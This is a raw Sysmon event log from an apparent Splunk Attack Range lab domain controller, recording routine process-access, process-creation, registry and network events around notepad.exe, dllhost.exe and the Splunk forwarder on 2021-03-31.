12:03:24.488{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.488{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:24.487{266CAFBE-650C-6064-1301-00000000AE01}6240C:\Windows\SysWOW64\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=6046950FC9CA5B7A7E084C189658DACB,SHA256=5137C324038AB2E8EAB4F98A20BEE9F121346D62E4D907CA1E4A860F4C54EAE8,IMPHASH=EC90A0D780E0DD23BA7910ABD6BF7E32{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 23542300x80000000000000008781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:25.533{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD7B27CF365CE8DC56453E6777D9F2CE,SHA256=E6DE4A313BBFF2F4C116E815E57019F4EEB8F9D00534BCE0470CDE3C0CDC75D3,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000008780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:25.080{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72625-0xda6afe64) 23542300x80000000000000008782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:26.562{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55F898E0F8E264A0F77508428595AB21,SHA256=496274C954508B3032EA9074D174A105AF94733330337DA2C7875E35639A9FD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:27.576{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B96E341BB5FAD644BC938FE904DFD677,SHA256=6E3DD8E2EAB532D9440D200B79C9A2FF12E55BBB36950F6D85B9FA1D61499D75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:28.698{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A48E1F4B6D4E356B9116E17A5451AD5,SHA256=4BB938B864255B9E736DADC6F8D230088ED3EC4462FB1878DAFA6D51FA08C33E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:26.448{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53610-false10.0.1.12-8000- 13241300x80000000000000008788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:28.215{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE} {00000122-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x80000000000000008787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:28.199{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{ECF03A32-103D-11D2-854D-006008059367} {00000122-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x80000000000000008786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:28.184{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{9E56BE61-C50F-11CF-9A2C-00A0C90A90CE} {00000122-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x80000000000000008785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:28.153{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062} {00000122-0000-0000-C000-000000000046} 0xFFFFBinary Data 13241300x80000000000000008784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:27.997{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFFBinary Data 23542300x80000000000000008814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.728{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DF7B6F04F546DE6FC8BF27361C2C776,SHA256=342EF06ED4B8B3EE1E49483EC6AF2C4FB1EBF113753455D29430B7966B9E2C57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.509{266CAFBE-64C5-6064-A500-00000000AE01}43565856C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.509{266CAFBE-64C5-6064-A500-00000000AE01}43565856C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.509{266CAFBE-64C5-6064-A500-00000000AE01}43565856C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.494{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.478{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.431{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.431{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.244{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.244{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.244{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.244{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.244{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.244{266CAFBE-64C5-6064-A500-00000000AE01}43565668C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+17d35c|C:\Windows\System32\SHELL32.dll